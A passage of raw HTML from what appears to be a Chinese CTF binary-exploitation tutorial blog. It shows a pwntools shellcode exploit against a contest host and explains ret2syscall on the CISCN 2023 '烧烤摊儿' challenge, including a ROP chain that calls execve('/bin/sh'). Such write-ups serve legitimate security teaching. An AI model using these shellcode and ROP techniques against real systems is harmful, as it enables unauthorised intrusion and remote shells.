fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *\n\ncontext.arch = \"amd64\"\np = remote(\"node5.anna.nssctf.cn\", 25511)\n\nshellcode = asm(shellcraft.sh())\nbuff = 0x4040A0\n\npayload = shellcode.ljust(0x100, b'\\x00') + b'=Triode=' + p64(buff)\n\np.sendline(payload)\n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">context<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">arch <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">amd64<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node5.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">25511<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">shellcode <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">asm<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">shellcraft<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sh<\/span><span style=\"color: #ECEFF4\">())<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">buff <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4040A0<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> shellcode<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">buff<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd0\u884c\u5c31\u53ef\u4ee5\u5f97\u5230shell\u4e86\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"302\" height=\"55\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-175\"  sizes=\"auto, (max-width: 302px) 100vw, 302px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\uff1a\u4e00\u822c\u800c\u8a00\uff0c\u7a0b\u5e8f\u90fd\u4f1a\u5f00\u542f\u5806\u6808\u4fdd\u62a4\uff0c\u6240\u4ee5\u6211\u4eec\u901a\u5e38\u4f1a\u5411<code>bss<\/code>\u6bb5\u6216<code>data<\/code>\u6bb5\u5199\u5165shellcode\uff0c\u6709\u65f6\u5019\u4e5f\u4f1a\u5229\u7528ret2csu\u4e0eret2syscall\u6765\u5411\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\u533a\u6bb5\u5199\u5165shellcode\u6765\u653b\u51fb<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">ret2syscall<\/h2>\n\n\n\n<p>ret2syscall\u987e\u540d\u601d\u4e49\u5c31\u662f\u63a7\u5236\u7cfb\u7edf\u6267\u884c\u7cfb\u7edf\u8c03\u7528\u6765\u83b7\u5f97shell\uff0c\u4e00\u822c\u5728\u7a0b\u5e8f\u9759\u6001\u94fe\u63a5\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\uff08\u56e0\u4e3a\u9759\u6001\u94fe\u63a5\u7684\u65f6\u5019\u6ca1\u6709\u529e\u6cd5\u4f7f\u7528ret2libc\u6280\u672f\u8fdb\u884cget shell\uff09<\/p>\n\n\n\n<p>\u572832\u4f4d\u7a0b\u5e8f\u4e2d\uff0cret2syscall\u4e3b\u8981\u4f9d\u8d56\u4e8e<code>int 0x80<\/code>\u6c47\u7f16\u6bb5\uff0c\u800c\u572864\u4f4d\u7cfb\u7edf\u4e2d\uff0cret2syscall\u5219\u4e3b\u8981\u4f9d\u8d56\u4e8e<code>syscall<\/code>\u6c47\u7f16\u6bb5\uff0c\u8fd9\u4e24\u6bb5\u6c47\u7f16\u90fd\u4f1a\u901a\u8fc7\u8c03\u7528\u4e00\u4e9b\u5bc4\u5b58\u5668\u7684\u503c\u6765\u8fdb\u884c\u7cfb\u7edf\u8c03\u7528\uff0cLinux\u7cfb\u7edf\u7684\u7cfb\u7edf\u8c03\u7528\u53ef\u4ee5\u5b9e\u73b0\u7684\u51fd\u6570\uff0c\u5bf9\u5e94\u7684\u7f16\u53f7\u4ee5\u53ca\u53c2\u6570\u6240\u5b58\u653e\u7684\u5bc4\u5b58\u5668\u53ef\u4ee5\u5728<a href=\"https:\/\/www.chromium.org\/chromium-os\/developer-library\/reference\/linux-constants\/syscalls\/\">Linux System Call Table<\/a>\u4e2d\u67e5\u8be2\uff0c\u5e38\u7528\u7684\u4e00\u822c\u6709<code>read<\/code>\uff0c<code>write<\/code>\u4ee5\u53ca<code>execve<\/code>\u3002ret2syscall\u6709\u65f6\u9700\u8981\u7528\u5230ret2csu\u7684\u6280\u672f\u6765\u5411\u6307\u5b9a\u5bc4\u5b58\u5668\u6765\u5199\u5165\u60f3\u8981\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[CISCN 2023 \u521d\u8d5b] \u70e7\u70e4\u644a\u513f<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/4055\">CISCN 2023 \u521d\u8d5b-\u70e7\u70e4\u644a\u513f | NSSCTF<\/a><\/p>\n\n\n\n<p>\u901a\u8fc7<code>file<\/code>\u547d\u4ee4\u53ef\u4ee5\u770b\u5230\u8fd9\u662f\u4e2a\u9759\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"692\" height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-176\"  sizes=\"auto, (max-width: 692px) 100vw, 692px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u76f4\u63a5IDA\u53cd\u7f16\u8bd1\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"519\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-177\"  sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u663e\u7136\u6709\u4e00\u4e2a\u7c7b\u4f3c\u5546\u5e97\u83dc\u5355\u7684\u4e1c\u897f\uff0c\u53d1\u73b0\u6709\u4e2a<code>if ( own )<\/code>\u7684\u5224\u65ad\uff0c\u4ea4\u53c9\u5f15\u7528<code>own<\/code>\u8fd9\u4e2a\u53d8\u91cf\u53d1\u73b0\u4f1a\u8fdb\u5165<code>vip<\/code>\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"204\" height=\"229\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-178\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\uff08\u56e0\u4e3a\u7f16\u7801\u95ee\u9898\uff0c\u4e2d\u6587\u5e76\u4e0d\u80fd\u6b63\u5e38\u663e\u793a\uff09<\/p>\n\n\n\n<p>\u901a\u8fc7\u5bf9\u529f\u80fd\u7684\u5206\u6790\u53ef\u4ee5\u5927\u81f4\u77e5\u9053\u5f53\u6211\u4eec\u4f59\u989d\u5927\u4e8e<code>100000<\/code>\u7684\u65f6\u5019\u53ef\u4ee5\u628a\u5546\u5e97\u4e70\u4e0b\u6765\uff08\u4e5f\u5c31\u662f\u8ba9<code>own<\/code>\u7b49\u4e8e<code>1<\/code>\uff09\uff0c\u6b64\u65f6\u6211\u4eec\u5c31\u53ef\u4ee5\u8fdb\u5165<code>gaiming<\/code>\u51fd\u6570\uff08\u53ef\u4ee5\u7ed9\u5546\u5e97\u6539\u540d\uff09\u3002\u7ffb\u9605\u51fd\u6570\u53d1\u73b0<code>pijiu<\/code>\u8fd9\u4e2a\u51fd\u6570\u5728\u8d2d\u4e70\u7684\u65f6\u5019\u4f3c\u4e4e\u5e76\u6ca1\u6709\u5bf9\u6570\u91cf\u8fdb\u884c\u9650\u5236\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"553\" height=\"422\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-179\"  sizes=\"auto, (max-width: 553px) 100vw, 553px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8d2d\u4e70\u8d1f\u6570\u6570\u91cf\u7684\u5546\u54c1\u6765\u8ba9\u81ea\u5df1\u7684\u4f59\u989d\u589e\u52a0\uff0c\u4ece\u800c\u4e70\u4e0b\u5546\u5e97\uff0c\u5148\u770b\u770b<code>gaiming<\/code>\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"607\" height=\"197\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-180\"  sizes=\"auto, (max-width: 607px) 100vw, 607px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>scanf<\/code>\u8f93\u5165\u5b57\u7b26\u4e32\u8fdb\u884c\u6539\u540d\uff0c\u5e76\u5c06\u6539\u7684\u540d\u5b57\u653e\u5230\u5904\u4e8edata\u6bb5\u4e0a\u7684<code>name<\/code>\u4e2d\uff0c\u56e0\u4e3a\u662f\u9759\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\uff0c\u6240\u4ee5\u5e76\u4e0d\u80fd\u901a\u8fc7ret2libc\u6280\u672f\u6765get shell\uff0c\u90a3\u4e48\u5c31\u53ef\u80fd\u9700\u8981\u4f7f\u7528ret2syscall\u6280\u672f\u6765get shell\u4e86\uff0c\u901a\u8fc7ROPgadget\u53ef\u4ee5\u627e\u5230<code>syscall<\/code>\u6240\u5728\u7684\u4f4d\u7f6e\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"481\" height=\"159\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-181\"  sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u901a\u8fc7\u67e5\u8be2\u53ef\u4ee5\u77e5\u9053\u572864\u4f4d\u7a0b\u5e8f\u4e2d<code>execve<\/code>\u7684\u7cfb\u7edf\u8c03\u7528\u7f16\u53f7\u4e3a<code>0x3b<\/code>\uff08\u5b58\u653e\u5728<code>rax<\/code>\u5bc4\u5b58\u5668\u4e2d\uff09\uff0c\u4e14<code>rdi<\/code>\uff0c<code>rsi<\/code>\uff0c<code>rdx<\/code>\u5bc4\u5b58\u5668\u4e2d\u5206\u522b\u5b58\u653e<code>filename<\/code>\uff0c<code>argv<\/code>\u4ee5\u53ca<code>envp<\/code>\uff0c\uff08\u4e09\u4e2a\u53c2\u6570\u7684\u610f\u4e49\u5728ret2csu\u7684[\u4f8b\u9898](#\u4f8b\uff1a[0xgame 2024 Week1] ret2csu)\u4e2d\u6709\u63d0\u53ca\uff09\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6784\u9020<code>execve('\/bin\/sh', 0, 0)<\/code>\u6765\u5b9e\u73b0\u83b7\u5f97shell\uff0c\u901a\u8fc7\u5bfb\u627e\u53ef\u4ee5\u5206\u522b\u627e\u5230<code>pop rax<\/code>\uff0c<code>pop rdi<\/code>\uff0c<code>pop rsi<\/code>\u4ee5\u53ca\u4e00\u6761<code>pop rdx pop rbx<\/code>\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u901a\u8fc7\u5148\u5411\u5904\u4e8edata\u6bb5\u7684<code>name<\/code>\u4e2d\u5b58\u5165<code>\/bin\/sh<\/code>\uff0c\u968f\u540e\u6784\u9020\u5982\u4e0brop\u94fe\u5373\u53ef\u901a\u8fc7ret2syscall\u6765\u83b7\u5f97shell\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>p64(pop_rax) + p64(59) + p64(pop_rdi) + p64(sh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_pop_rbx) + p64(0) + p64(0) + p64(syscall)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rax<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">59<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rsi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">syscall<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7531\u6b64\u53ef\u4ee5\u5f97\u5230\u6700\u7ec8\u7684\u653b\u51fb\u4ee3\u7801\uff1a<\/p>\n\n\n\n<div 